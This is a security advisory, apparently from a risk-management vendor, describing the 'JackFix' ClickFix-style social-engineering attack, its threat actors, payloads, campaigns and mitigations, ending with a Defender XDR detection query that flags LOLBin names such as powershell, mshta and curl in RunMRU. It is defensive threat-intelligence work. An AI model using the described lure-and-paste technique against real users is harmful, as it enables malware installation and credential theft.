Executive Summary

The emergence of the JackFix attack marks a critical escalation in the ongoing evolution of social engineering and malware delivery tactics. JackFix is a sophisticated variant of the well-documented ClickFix technique, engineered specifically to circumvent both technical and human-centric mitigations that have been deployed in response to earlier campaigns. By leveraging advanced obfuscation, multi-stage payload delivery, and cross-platform compatibility, JackFix enables threat actors to bypass browser warnings, endpoint detection, and user awareness training. The attack chain culminates in the delivery of high-impact malware families, including infostealers, remote access trojans (RATs), and rootkits, with observed payloads such as Lumma Stealer, Latrodectus, NetSupport RAT, and Atomic macOS Stealer (AMOS). This advisory provides a comprehensive technical analysis of the JackFix attack, its tactics, techniques, and procedures (TTPs), exploitation in the wild, victimology, and actionable mitigation strategies.

Threat Actor Profile

The JackFix attack has been attributed to a constellation of financially motivated and advanced persistent threat (APT) groups, including but not limited to Storm-1607, Storm-0426, Storm-0249, and the OBSCURE#BAT cluster. These actors have demonstrated a high degree of operational agility, rapidly iterating on social engineering lures and technical delivery mechanisms. Storm-1607 is known for deploying DarkGate malware in North America, while Storm-0426 and Storm-0249 have been linked to MintsLoader and Latrodectus loader campaigns in Europe. The OBSCURE#BAT group specializes in deploying stealthy rootkits via Discord-themed lures. These actors leverage a global infrastructure of compromised domains, malvertising networks, and phishing kits, enabling them to target a diverse set of sectors and geographies with high precision.

Technical Analysis of Malware/TTPs

The JackFix attack chain is a multi-stage process that exploits both human and technical vulnerabilities. The initial access vector typically involves phishing emails, malvertising, or compromised websites that redirect users to a JackFix landing page. These pages are meticulously crafted to impersonate trusted brands such as Microsoft, Social Security Administration, Discord, and Spectrum. The lure often takes the form of a fake verification prompt, such as a Cloudflare Turnstile, Google reCAPTCHA, or a Discord invite.

Upon user interaction, malicious JavaScript code leverages the navigator.clipboard.writeText() API to copy a pre-crafted command to the user's clipboard. The user is then instructed to paste this command into the Windows Run dialog, PowerShell, or macOS Terminal. The command is heavily obfuscated, employing techniques such as Base64 encoding, string concatenation, and escape characters to evade static analysis and signature-based detection.

Execution of the command initiates a fileless, multi-stage payload delivery process. On Windows, the attack chain frequently abuses living-off-the-land binaries (LOLBins) such as powershell.exe, mshta.exe, and rundll32.exe to download and execute additional payloads. These payloads include infostealers (Lumma Stealer, Lampion), RATs (NetSupport, Xworm), loaders (Latrodectus, MintsLoader), and rootkits (r77). On macOS, the attack leverages Bash scripts that prompt the user for their password, enabling the installation of AMOS and other macOS-specific malware.

Persistence is achieved through the creation of registry keys (notably RunMRU) and scheduled tasks, while evasion is facilitated by anti-VM checks, multi-stage scripting, and masquerading techniques. The attack chain is designed to be highly modular, allowing threat actors to swap payloads and delivery mechanisms with minimal effort.

Exploitation in the Wild

JackFix has been observed in a series of high-profile campaigns targeting multiple sectors and regions. In May and June 2025, the Lampion campaign targeted government, finance, and transportation entities in Portugal, Switzerland, Luxembourg, France, Hungary, and Mexico. Attackers used phishing emails with ZIP or HTML attachments that led to JackFix lures and multi-stage VBScript payloads.

In June 2025, a campaign impersonating the US Social Security Administration used Google Ads redirects and a spoofed SSA website to deliver ScreenConnect via the JackFix technique. Malvertising campaigns in April 2025 redirected users from streaming sites to JackFix pages, delivering Lumma Stealer through scripts disguised as media files with extensions such as .mp3, .mp4, and .ogg.

On macOS, a campaign in May and June 2025 used Spectrum-themed lures to deliver AMOS, prompting users for their password and bypassing native macOS security controls. These campaigns demonstrate the adaptability of JackFix and its ability to exploit both technical and human vulnerabilities across platforms.

Victimology and Targeting

The JackFix attack has been deployed against a broad spectrum of sectors, including government, finance, transportation, education, and financial services. Geographically, confirmed targets include organizations in Portugal, Switzerland, Luxembourg, France, Hungary, Mexico, the United States, Canada, and Germany. The attack is opportunistic but demonstrates a preference for high-value targets with access to sensitive data or financial assets. The use of brand impersonation and localized lures indicates a high degree of reconnaissance and targeting sophistication.

Mitigation and Countermeasures

Mitigating the JackFix attack requires a multi-layered approach that addresses both technical and human factors. User education remains paramount; organizations should conduct regular training to help users recognize social engineering tactics and the dangers of copying and pasting commands from untrusted sources. Device configurations should be hardened by disabling unnecessary use of the Run dialog and restricting access to PowerShell and Terminal for non-administrative users.

Technical controls should include enabling Microsoft Defender SmartScreen and network protection features, deploying endpoint detection and response (EDR) solutions with behavioral analytics capable of detecting LOLBin abuse and obfuscated scripts, and monitoring for suspicious registry entries such as RunMRU. Email filtering and URL rewriting should be configured to block known phishing and malvertising vectors.

Detection can be enhanced using queries such as the following for Microsoft Defender XDR:

kusto DeviceRegistryEvents | where ActionType =~ "RegistryValueSet" | where InitiatingProcessFileName =~ "explorer.exe" | where RegistryKey has @"\CurrentVersion\Explorer\RunMRU" | where RegistryValueData has_any ("powershell", "mshta", "curl", "msiexec", "^")

Network monitoring should focus on connections to known malicious domains and IP addresses associated with JackFix campaigns. File and process monitoring should flag suspicious executions of PowerShell, mshta, rundll32, or wscript, especially when initiated from explorer.exe or the Run dialog.

References

• Microsoft Security Blog: Think before you Click(Fix)

• Securonix: OBSCURE#BAT Analysis

• CloudSEK: AMOS via ClickFix

• Proofpoint: ClickFix Social Engineering

• NVD (for related vulnerabilities in LOLBins and Windows/macOS scripting environments)

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their digital supply chain. Our platform leverages advanced threat intelligence, automation, and continuous monitoring to empower security teams with actionable insights and proactive defense strategies. For more information about how Rescana can help your organization strengthen its cyber resilience, we are happy to answer questions at ops@rescana.com.